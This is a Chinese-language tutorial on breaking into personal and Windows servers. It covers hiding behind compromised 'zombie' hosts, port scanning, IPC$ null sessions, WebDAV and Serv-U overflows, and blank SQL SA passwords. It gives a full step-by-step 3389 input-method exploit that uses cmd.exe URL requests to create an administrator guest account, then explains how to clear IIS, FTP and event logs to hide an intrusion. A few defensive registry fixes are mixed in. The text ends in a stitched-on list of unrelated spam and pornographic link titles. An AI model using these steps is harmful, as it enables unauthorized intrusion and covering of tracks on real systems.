入侵個人主機網(wǎng)絡(luò)的步驟
第一步:隱藏自已的位置
為了不在目的主機上留下自己的IP地址,防止被目的主機發(fā)現(xiàn),老練的攻擊者都會盡 量通過“跳板”或“肉雞”展開攻擊。所謂“肉雞”通常是指,HACK實現(xiàn)通過后門程序控制 的傀儡主機,通過“肉雞”開展的掃描及攻擊,即便被發(fā)現(xiàn)也由于現(xiàn)場遺留環(huán)境的IP地址是 “肉雞”的地址而很難追查。
第二步:尋找目標(biāo)主機并分析目標(biāo)主機
攻擊者首先要尋找目標(biāo)主機并分析目標(biāo)主機。在Internet上能真正標(biāo)識主機的是IP地 址,域名是為了便于記憶主機的IP地址而另起的名字,只要利用域名和IP地址就可以順利地 找到目標(biāo)主機。當(dāng)然,知道了要攻擊目標(biāo)的位置還是遠遠不夠的,還必須將主機的操作系統(tǒng) 類型及其所提供服務(wù)等資料作個全面的了解。此時,攻擊者們會使用一些掃描器工具,以試 圖獲取目標(biāo)主機運行的是哪種操作系統(tǒng)的哪個版本,系統(tǒng)有哪些帳戶,開啟了哪些服務(wù),以 及服務(wù)程序的版本等資料,為入侵作好充分的準(zhǔn)備。
第三步:獲取帳號和密碼,登錄主機
攻擊者要想入侵一臺主機,首先要有該主機的一個帳號和密碼,否則連登錄都無法進 行。這樣常迫使他們先設(shè)法盜竊帳戶文件,進行破解,從中獲取某用戶的帳戶和口令,再尋 覓合適時機以此身份進入主機。當(dāng)然,利用某些工具或系統(tǒng)漏洞登錄主機也是攻擊者常用的 一種技法。
第四步:獲得控制權(quán)
攻擊者們利用各種工具或系統(tǒng)漏洞進入目標(biāo)主機系統(tǒng)獲得控制權(quán)之后,就會做兩件事 :清除記錄和留下后門。他會更改某些系統(tǒng)設(shè)置、在系統(tǒng)中置入特洛伊木馬或其他一些遠程 操縱程序,以便日后可以不被覺察地再次進入系統(tǒng)。此外,為了避免目標(biāo)主機發(fā)現(xiàn),清除日 志、刪除拷貝的文件等手段來隱藏自己的蹤跡之后,攻擊者就開始下一步的行動。
第五步:竊取網(wǎng)絡(luò)資源和特權(quán)
攻擊者找到攻擊目標(biāo)后,會繼續(xù)下一步的攻擊。如:下載敏感信息;竊取帳號密碼、 個人資料等。
三、網(wǎng)絡(luò)攻擊的原理和手法
1、從掃描開始
掃描往往是攻擊的前奏,通過掃描,搜集目標(biāo)主機的相關(guān)信息,以期尋找目標(biāo)主機的漏洞。 常見的掃描工具有X-scan、superscan、流光、X-port等。
在這些工具中,國產(chǎn)的X-scan與流光可算的上是兩個“利器”,這兩個工具不但具有相當(dāng)快 的掃描速度和精確度(個人感覺X-scan在掃描速度上可能更快一點),同時還是發(fā)起攻擊的 第一手選擇,當(dāng)然在攻擊方面,流光更為強悍些。
除了常見個WWW(80)、FTP(21)、TELNET(23)等,查查十大高風(fēng)險事件,我們就知道, 攻擊者通常還對下列端口很感興趣:
135:MS RPC,可以產(chǎn)生針對Windows 2000/XP RPC服務(wù)遠程拒絕服務(wù)攻擊,以及RPC溢出漏 洞,著名的“沖擊波”“震蕩波”就是利用DCOM RPC感染設(shè)備;
137~139:NetBIOS,WINDOWS系統(tǒng)通過這個端口提供文件和打印共享;
445:Microsoft-ds,非常重要的端口,LSASS漏洞、RPC定位漏洞都在這里出現(xiàn);
1433:Microsoft SQL,后面會提到,SQL SERVER默認(rèn)安裝時留下的空口令SA用戶可以讓攻 擊者為所欲為;
5632:PCANYWERE,一種遠程終端控制軟件;
3389:WINDOWS遠程終端服務(wù)
4899:RADMIN,一種遠程終端控制軟件
由此可見,沒有掃描,自然也就沒有攻擊,從安全的角度的來說,個人主機最安全的系統(tǒng)應(yīng) 該算是WINDOWS98,由于WINDOWS98幾乎不開啟任何服務(wù),自然也沒有任何開放端口,沒有端 口,對于這類系統(tǒng)攻擊的可能性就大大降低。當(dāng)然,XP在打了SP2的補丁后,等于有了一個 基于狀態(tài)的個人防火墻,相對安全性也提高了很多。
2、攻擊開始
掃描到有開放的端口,下一步自然是針對相關(guān)端口發(fā)起攻擊,針對不同端口常見攻擊方式有 :
139/445:“永恒”的IPC$(未發(fā)現(xiàn)此漏洞)
說是“永恒”,主要是因為這種漏洞基本已經(jīng)只能存在于記憶中了。
什么是IPC,IPC是共享“命名管道”的資源,主要用于程序間的通訊。在遠程管理計算機和 查看計算機的共享資源時使用。什么是“空連接”,利用默認(rèn)的IPC我們可以與目標(biāo)主機建 立一個空的連接(無需用戶名與密碼),而利用這個空的連接,我們就可以得目標(biāo)主機上的 用戶列表。
得到用戶列表有什么用?我們可以利用IPC,訪問共享資源,導(dǎo)出用戶列表,并使用一些字 典工具,進行密碼探測。得到了用戶權(quán)限后,我們可以利用IPC共享訪問用戶的資源。但所 謂的ipc漏洞ipc漏洞,其實并不是真正意義上的漏洞,WINDOWS設(shè)計初衷是為了方便管理員 的遠程管理而開放的遠程網(wǎng)絡(luò)登陸功能,而且還打開了默認(rèn)共享,即所有的邏輯盤(c,d,e ……)和系統(tǒng)目錄winnt或windows(admin)。所有的這些,初衷都是為了方便管理員的管理, 但好的初衷并不一定有好的收效,曾經(jīng)在一段時間,IPC$已經(jīng)成為了一種最流行的入侵方式 。
IPC$需要在NT/2000/XP下運行,通常如果掃描出目標(biāo)開放了139或445端口,往往是目標(biāo)開啟 IPC$的前兆,但如果目的主機關(guān)閉了IPC $連接共享,你依然無法建立連接,同樣如果管理 員設(shè)置禁止導(dǎo)出用戶列表,你就算建立IPC$連接也無法看到對方的用戶列表。另外提醒一下 ,WINXP系統(tǒng)中,已經(jīng)禁止了遠程用戶的訪問權(quán)限,因此,如果對方是XP的操作系統(tǒng),就別 費這個勁了。
如何防范ipc$入侵
1禁止空連接進行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)
首先運行regedit,找到如下組建 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為:00000001(如果設(shè)置為2的話,有一些問題會發(fā)生,比如一些WIN的服務(wù)出現(xiàn) 問題等等)
2禁止默認(rèn)共享
1)察看本地共享資源
運行-cmd-輸入net share
2)刪除共享(每次輸入一個)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以繼續(xù)刪除)
3)停止server服務(wù)
net stop server /y (重新啟動后server服務(wù)會重新開啟)
4)修改注冊表
運行-regedit
server版:找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareServer(DWORD)的鍵值改為:00000000。
pro版:找到如下主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把 AutoShareWks(DWORD)的鍵值改為:00000000。
如果上面所說的主鍵不存在,就新建(右擊-新建-雙字節(jié)值)一個主健再改鍵值。
3永久關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù):lanmanserver即server服務(wù)
控制面板-管理工具-服務(wù)-找到server服務(wù)(右擊)-屬性-常規(guī)-啟動類型-已禁用
4安裝防火墻(選中相關(guān)設(shè)置),或者端口過濾(濾掉139,445等)
5設(shè)置復(fù)雜密碼,防止通過ipc$窮舉密碼
除了IPC$,我們還可以利用例如SMBCRACK通過暴力猜解管理員口令,如果對方未打補丁,我 們還可以利用各種RPC漏洞(就是沖擊波、震蕩波用的那些漏洞),通過各種溢出程序, 來得到權(quán)限提升(原理和病毒感染的原理是一樣的)。
21:Serv-u入侵(未測試使用)
Serv-u是常用的FTP SERVER端軟件的一種,因為常用,所以被研究出的漏洞也不少,如果對 端開放了21端口,并且采用Seru-U來架站的話,可以查看一下對端的版本。對5. 004及以下 系統(tǒng),可用溢出入侵。(serv5004.exe)對5.1.0.0及以下系統(tǒng),有一個本地提升權(quán)限的漏 洞。(servlocal.exe)
Serv-U FTP Serve在設(shè)置用戶以后會把配置信息存儲與ServUDaemon.ini文件中。包括用戶 的權(quán)限信息和可訪問目錄信息。本地受限用戶或者是遠程攻擊者只要能夠讀寫Serv-U FTP Serve的文件目錄,就可以通過修改目錄中的ServUDaemon.ini文件實現(xiàn)以Ftp進程在遠程、 本地系統(tǒng)上以FTP系統(tǒng)管理員權(quán)限來執(zhí)行任意命令。
80:曾經(jīng)的神話“WEBDAV”(使用情況,成功溢出4臺主機,并登陸其中一臺,其他3臺的 IIS重啟)
微軟的IIS功能強大,但遺憾的是同樣漏洞多多,如果IIS不打補丁到SP3的話,那么就有一 個著名的WEBDAV漏洞。
Webdav漏洞說明:
Microsoft Windows 2000 支持“萬維網(wǎng)分布式創(chuàng)作和版本控制 (WebDAV)”協(xié)議。RFC 2518 中定義的 WebDAV 是超文本傳輸協(xié)議 (HTTP) 的一組擴展,為 Internet 上計算aIIS 服務(wù) (默認(rèn)情況下在 LocalSystem 上下文中運行)的安全上下文中運行。 盡管 Microsoft 已 為此弱點提供了修補程序并建議客戶立即安裝該修補程序,但還是提供了其他的工具和預(yù)防 措施,客戶在評估該修補程序的影響和兼容性時可以使用這些工具和措施來阻止此弱點被利 用。
可以使用掃描器:Webdavscan(是一個專門用于檢測IIS 5.0 服務(wù)器是否提供了對WebDAV的 支持的掃描器)來查找網(wǎng)絡(luò)中存在WEBDAV漏洞的主機,并用溢出程序:wdx.exe來進行攻擊 當(dāng)溢出成功后,就可以使用telnet或者是nc等連接到目標(biāo)主機的7788端口。
如:telnet 127.0.0.1 7788
如果正常的話,將出現(xiàn)以下提示:
Microsoft Windows 2000 [Version 5.00.2195] (C) 版權(quán)所有 1985-2000 Microsoft Corp. C:\WINNT\system32>
OK!
如何防御:
1. 搜索注冊表中的如下鍵:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
增加如下注冊表鍵值:
value name: DisableWebDAV
Data type: DWORD
value data: 1
2. 使用MS提供的專用補丁!
1433:Microsoft SQL的SA空口令(掃描到4臺,成功登陸其中3臺)
微軟的MSSQL7.0以下的版本在默認(rèn)安裝時其SA(System Administrator)口令為空,所開端口 為1433,這個漏洞很早了,但直到現(xiàn)在我們依然可以掃描到很多空口令的SA。更為“搞笑” 的是,微軟為了能夠讓SQL管理員管理方便,還設(shè)計了一個xp_cmdshell來執(zhí)行各種相關(guān)命令 。一個入侵者只需要使用一個MS SQL客戶端與SA口令為空的服務(wù)器連接就可以獲得System的 權(quán)限,并可以在目標(biāo)主機上執(zhí)行任意命令。
攻擊方式,利用“流光”或其他掃描工具可以掃描、破解SA口令,破解成功后可以使用SQL 客戶端(如SQLEXEC)連接,并獲得系統(tǒng)權(quán)限。
解決辦法:
更改SA管理用戶口令;
刪除XP_CMDSHELL命令。(但并不保險,因為如果擁有SA權(quán)限,還是可能恢復(fù)該命令的)
3389:3389輸入法漏洞(不太可能存在了,但可以猜解管理員用戶口令)
Microsoft Windows 2000 Server及以上版本在安裝服務(wù)器時,其中有一項是超級終端服務(wù) ,該服務(wù)可以使用戶通過圖形界面象管理本地計算機一樣控制遠程計算機(因此成為眾多攻 擊者的最愛)。該服務(wù)所開放的端口號為3389,是微軟為了方便用戶遠程管理而設(shè)。但是中 文Windows 2000存在有輸入漏洞,其漏洞就是用戶在登錄Windows 2000時,利用輸入法的幫 助文件可以獲得Administrators組權(quán)限。
1、用終端客戶端程序進行連接;
2、按ctrl+shift調(diào)出全拼輸入法(其他似乎不行),點鼠標(biāo)右鍵(如果其幫助菜單發(fā)灰, 就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;
3、在\"選項\"菜單上點右鍵--->跳轉(zhuǎn)到URL\",輸入:c:\\winnt\\system32\\cmd.exe.( 如果不能確定NT系統(tǒng)目錄,則輸入:c:\\ 或d:\\ ……進行查找確定);
4、選擇\"保存到磁盤\" 選擇目錄:c:\\inetpub\\s\\,因?qū)嶋H上是對方服務(wù)器上文件自身 的復(fù)制操作,所以這個過程很快就會完成;
5、打開IE,輸入:http://ip/s/cmd.exe?/c dir 怎么樣?有cmd.exe文件了吧?這我們就 完成了第一步;
6、http://ip/s/cmd.exe?/c echo net user guest /active:yes>go.bat
7、http://ip/s/cmd.exe?/c echo net user guest elise>>go.bat
8、http://ip/s/cmd.exe?/c echo net localgroup administrators /add
guest>>go.bat
9、http://ip/s/cmd.exe?/c type go.bat 看看我們的批文件內(nèi)容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
10、在\"選項\"菜單上點右鍵--->跳轉(zhuǎn)到URL\",輸入:c:\\inetpub\\s\\go.bat --->在磁 盤當(dāng)前位置執(zhí)行;
11、OK,.這樣我們就激活了服務(wù)器的geust帳戶,密碼為:elise,超級用戶!
注意事項:
當(dāng)你用終端客戶端程序登陸到他的服務(wù)器時,你的所有操作不會在他的機器上反應(yīng)出來,但 如果他正打開了終端服務(wù)管理器,你就慘了了:(這時他能看到你所打開的進程id、程序映 象,你的ip及機器名,并能發(fā)消息給你!
1.在IE下,所擁有的只是iusr_machine權(quán)限,因而,你不要設(shè)想去做越權(quán)的事情,如啟動 telnet、木馬等;
2.url的跳轉(zhuǎn)下,你將擁有超級用戶的權(quán)限,好好利用吧 :-)
這個漏洞在WIN2000 SP1中已經(jīng)修改,因此,實際網(wǎng)絡(luò)中存在此漏洞的機器幾乎沒有,但是 ,據(jù)說紫光2.3版本、超級五筆的輸入法中又發(fā)現(xiàn)此漏洞。
解決方法
1.打補丁;
2.刪掉相關(guān)輸入法,用標(biāo)準(zhǔn)就可以;
3.服務(wù)中關(guān)掉:Terminal Services,服務(wù)名稱:TermService,對應(yīng)程序名:system32 [url=file://\\termsrv.exe]\\termsrv.exe[/url];
如果對方已經(jīng)修改了輸入法漏洞,那么只能通過猜解目標(biāo)管理員口令的方法來嘗試遠程登陸 。
5632/4899:PCANYWERE和RADMIN
這是兩種遠程控制軟件,使用方式與遠程終端訪問類似,都支持圖形化界面對遠程計算機進 行管理,設(shè)計的初衷是為了讓管理員能夠更方便的管理設(shè)備,但這些軟件,特別是RADMIN, 可以設(shè)置其在安裝時,不出現(xiàn)任何提示,這種方式使RADMIN更多的被做為一種木馬使用。攻 擊者會注意掃描這些端口,因為一旦破解了相應(yīng)口令就可以象操作本地計算機一樣控制目標(biāo) 。
23:猜解ADSL MODEM口令
很多時候,掃描只能得到一個23端口,不要沮喪,因為對于個人主機而言,這往往是因為目 標(biāo)主機采用了一個ADSL MODEM上網(wǎng)。一般用戶在使用ADSL MODEM時,往往未加設(shè)置,這時, 攻擊者往往可以利用ADSL MODEM的默認(rèn)口令,登陸ADSL,一旦登陸成功,就有可能竊取ADSL 帳戶和口令,并可以查看到內(nèi)網(wǎng)的IP地址設(shè)置,并通過配置NAT映射將內(nèi)網(wǎng)PC的相關(guān)端口映 射到公網(wǎng)上,然后對其進行各種破解、攻擊。
特洛伊木馬
掃描端口、通過各種方法獲得目標(biāo)主機的用戶權(quán)限之后,攻擊者往往利用得到的權(quán)限上傳執(zhí) 行一個“木馬”程序,以便能夠更方便的控制目標(biāo)主機。
特洛伊木馬是一種或是直接由一個黑客,或是通過一個不令人起疑的用戶秘密安裝到目標(biāo)系 統(tǒng)的程序。一旦安裝成功并取得管理員權(quán)限,安裝此程序的人就可以直接遠程控制目標(biāo)系統(tǒng) 。實際上,對于各種個人主機,在未開放端口和打全補丁后,最有效的攻擊方式還是“木馬 ”程序。攻擊者往往利用捆綁方式將木馬程序與一個普通的EXE文件、JPG或其他正常文件綁 定在一起,并利用“社會工程學(xué)”的方式,欺騙對方執(zhí)行程序、查看圖片等。在對方執(zhí)行程 序、打開圖片后,木馬程序就悄無聲息在用戶的PC上執(zhí)行,并將用戶的一些相關(guān)信息通過 EMAIL或其他方式發(fā)送給攻擊者,而攻擊者則可以通過木馬程序?qū)嵤⿲τ脩綦娔X的控制,比 如控制文件、注冊表、鍵盤記錄甚至控制屏幕等。
在早期,木馬程序程序隱藏的并不深,通過查看任務(wù)管理器就會發(fā)現(xiàn)系統(tǒng)內(nèi)存在不明程序在 運行,并且木馬程序還會在用戶主機上監(jiān)聽特定端口(如冰河的7626),等待攻擊者的連接 。典型的早期木馬如BO、BO2000、SUBSERVEN、國產(chǎn)的經(jīng)典木馬“冰河”等……這種方式的 木馬容易被發(fā)現(xiàn),而且被攻擊目標(biāo)也必須連接在公網(wǎng)上,因為客戶端是無法透過NAT、防火 墻連接到內(nèi)網(wǎng)的用戶的。
反彈端口類型木馬,“廣外女生”木馬是國內(nèi)出現(xiàn)最早反彈端口類型的木馬,這個木馬與傳 統(tǒng)的木馬不同,它在執(zhí)行后會主動連接外網(wǎng)的攻擊者的相關(guān)端口,這種方法就避免了傳統(tǒng)木 馬無法控制內(nèi)部用戶的弊端(因為防火墻一般不會對內(nèi)部發(fā)出的數(shù)據(jù)做控制)。此外,“廣 外女生”還會自動殺掉相關(guān)殺毒程序的進程。
傳統(tǒng)木馬在執(zhí)行后會作為一個進程,用戶可以通過殺掉進程的方法關(guān)閉,而現(xiàn)在的木馬則會 將自己注冊一個系統(tǒng)服務(wù),在系統(tǒng)啟動后自動運行。甚至?xí)ㄟ^DLL注入,將自己隱藏在系 統(tǒng)服務(wù)身后。這樣用戶查看進程的時候既看不到可疑進程,也看不到特殊服務(wù)……典型代表 “灰鴿子”“武漢男生”。
ASP木馬,典型代表“海陽頂端網(wǎng)木馬”。隨著ASP 技術(shù)的發(fā)展,網(wǎng)絡(luò)上基于ASP技術(shù)開發(fā)的 網(wǎng)站越來越多,對ASP技術(shù)的支持可以說已經(jīng)是windows系統(tǒng)IIS服務(wù)器的一項基本功能。但 是基于ASP技術(shù)的木馬后門,也越來越多,而且功能也越來越強大。ASP程序本身是很多網(wǎng)站 提供一些互動和數(shù)據(jù)處理的程序,ASP木馬則是利用ASP語言編制的腳本嵌入在網(wǎng)頁上,當(dāng)用 戶瀏覽這些網(wǎng)頁時會自動執(zhí)行相關(guān)ASP腳本,被木馬感染,這種方式更加簡單和隱蔽,需要 注意的是,ASP木馬往往是依靠IE瀏覽器的一些漏洞來執(zhí)行的,因此給IE打補丁是防范ASP木 馬的方法之一(當(dāng)然并非萬能,還有一些木馬會利用IE的未知漏洞傳播)。
清除日志
攻擊者在取得用戶權(quán)限后,為了避免被發(fā)現(xiàn),就要考慮清除用戶主機的相關(guān)日志,因為日志 系統(tǒng)往往會記錄攻擊者的相關(guān)攻擊過程和信息。
Windows2000的日志文件通常有應(yīng)用程序日志、安全日志、系統(tǒng)日志、DNS服務(wù)器日志、FTP 日志、WWW日志等等,可能會根據(jù)服務(wù)器所開啟的服務(wù)不同。
一般步驟如下:
1.清除IIS的日志。
可不要小看IIS的日志功能,它可以詳細的記錄下你的入侵全過程,如你用unicode入侵 時ie里打的命令,和對80端口掃描時留下的痕跡。
1. 日志的默認(rèn)位置:%systemroot%\system32\logfiles\w3svc1\,默認(rèn)每天一個日志 。那我們就切換到這個目錄下吧,然后 del *.*。但由于w3svc服務(wù)還開著,日志依然還在 。
方法一: 如有3389可以登錄,那就用notepad打開,按Ctrl+A 然后del吧。
方法二: net 命令
C:\>net stop w3svc
World Wide Web Publishing Service 服務(wù)正在停止。(可能會等很長的時間,也可能 不成功)
World Wide Web Publishing Service 服務(wù)已成功停止。
選擇先讓w3svc停止,再清除日志,不要忘了再重新打開w3svc服務(wù)。
C:\>net start w3svc
2. 清除ftp日志
FTP日志默認(rèn)位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默認(rèn)每天一個日 志,清除方法同上。
3. 清除Scheduler日志
Scheduler服務(wù)日志默認(rèn)位置:%systemroot%\schedlgu.txt。清除方法同上。
4. 應(yīng)用程序日志、安全日志、系統(tǒng)日志、DNS日志默認(rèn)位置:%systemroot%\sys tem32\config 。清除方法同上。
注意以上三個目錄可能不在上面的位置,那是因為管理員做了修改。可以讀取注冊表值 得到他們的位置:
應(yīng)用程序日志,安全日志,系統(tǒng)日志,DNS服務(wù)器日志,它們這些LOG文件在注冊表中的
HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog
Schedluler服務(wù)日志在注冊表中的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
5.清除安全日志和系統(tǒng)日志了,守護這些日志的服務(wù)是Event Log,試著停掉它!
D:\SERVER\system32\LogFiles\W3SVC1>net stop eventlog
這項服務(wù)無法接受請求的 "暫停" 或 "停止" 操作。沒辦法,它是關(guān)鍵服務(wù)。如果不用 第三方工具,在命令行上根本沒有刪除安全日志和系統(tǒng)日志的可能!打開“控制面板”的“ 管理工具”中的“事件查看器”,在菜單的“操作”項有一個名為“連接到另一臺計算機” 的菜單,點擊它然后輸入遠程計算機的IP,然后選擇遠程計算機的安全性日志,右鍵選擇它 的屬性,點擊屬性里的“清除日志”按鈕,同樣的方法去清除系統(tǒng)日志!
6.上面大部分重要的日志你都已經(jīng)清除了。然后要做的就是以防萬一還有遺漏的了。
del以下的一些文件:
\winnt\*.log
system32下
\logfiles\*.*
\dtclog\*.*
\config\*.evt
\*.log
\*.txt
主站蜘蛛池模板:
成 人国产在线观看高清不卡|
国产国产成人人免费影院|
中文字幕精品一区二区三区视频
|
2021天堂在线亚洲精品专区|
精品国产90后在线观看
|
影音先锋中文字幕资源|
中文字幕一区二区三区在线观看|
国产精品观看视频免费完整版|
日本电影免费久久精品|
成年大片免费高清在线看黄|
国产区一区|
欧美国产成人一区二区三区|
日韩综合在线观看|
亚洲天堂2015|
收集最新中文国产中文字幕
|
国产成人精品永久免费视频|
aⅴ免费视频|
国内亚州视频在线观看|
欧美太黄太色视频在线观看|
亚洲mm8成为人影院|
中文字幕在线视频精品|
69堂网站|
岬奈奈美在线 国产一区|
青青伊人国产|
亚洲一区二区三区免费|
久久成人免费观看全部免费|
国产成人精品第一区二区|
美女久草|
亚洲国产成a人v在线|
性刺激欧美三级在线现看中文|
a成人在线|
老汉老太bbbbbxxxxx|
色香蕉网|
成人免费观看在线视频|
成人观看免费观看视频|
麻豆免费看片|
亚洲成人国产精品|
日本久久和电影|
国模方敏337p人体|
日韩中文字幕在线播放|
成人区在线观看免费视频|